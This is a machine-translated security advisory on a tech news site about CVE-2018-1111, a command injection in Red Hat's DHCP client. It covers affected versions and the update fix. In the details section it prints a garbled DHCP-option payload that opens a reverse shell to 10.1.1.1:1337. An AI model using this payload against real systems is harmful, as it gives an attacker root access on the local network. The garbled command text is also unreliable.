What is the vulnerability of Red Hat DHCP client command execution? 02/23 Update SLTechnology News&Howtos

What is the vulnerability of Red Hat DHCP client command execution?

2025-02-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Shulou(Shulou.com)06/01 Report--

This article introduces what the Red Hat DHCP client command execution vulnerability is like, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Overview of 0x00 vulnerabilities

Recently, Red Hat officially released a security update to fix a remote code execution vulnerability numbered CVE-2018-1111, which allows attackers to send response packets by spoofing DHCP servers, attack Red Hat systems, gain root privileges and execute arbitrary commands.

At present, the relevant exploitation code has been made public and can be used for local network attacks; the technical analysis of this vulnerability in 360-CERT shows that the damage level of the vulnerability is serious, and it is recommended to use relevant users to update it as soon as possible.

0x01 vulnerability impact surface impact version

Red Hat Enterprise Linux Server 6

Red Hat Enterprise Linux Server 7

CentOS 6

CentOS 7

Repair scheme

Updates to affected products

Software package update

# yum update dhclient

# rpm-qa-- changelog dhclient | grep CVE-2018

-Resolves: # 1570898-Fix CVE-2018-1111: Do not parse backslash as escape character

0x02 vulnerability details

DHCP is a local area network protocol, which is mainly used for dynamic IP address allocation in internal networks.

The scripts for the DHCP client package dhclient provided by Red Hat are / etc/NetworkManager/dispatcher.d/11-dhclient (Red Hat Enterprise Linux 7) and / etc/NetworkManager/dispatcher.d/10-dhclient (Red Hat Enterprise Linux 6), which are executed when the NetworkManager component receives a DHCP response from the DHCP server.

The use of single quotes makes the parameter values escape successfully, resulting in the execution of the command

-- dhcp-option= "252 Xerox passport c-e / bin/bash 10.1.1.1 1337 #"

On the Red Hat DHCP client command execution vulnerability is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.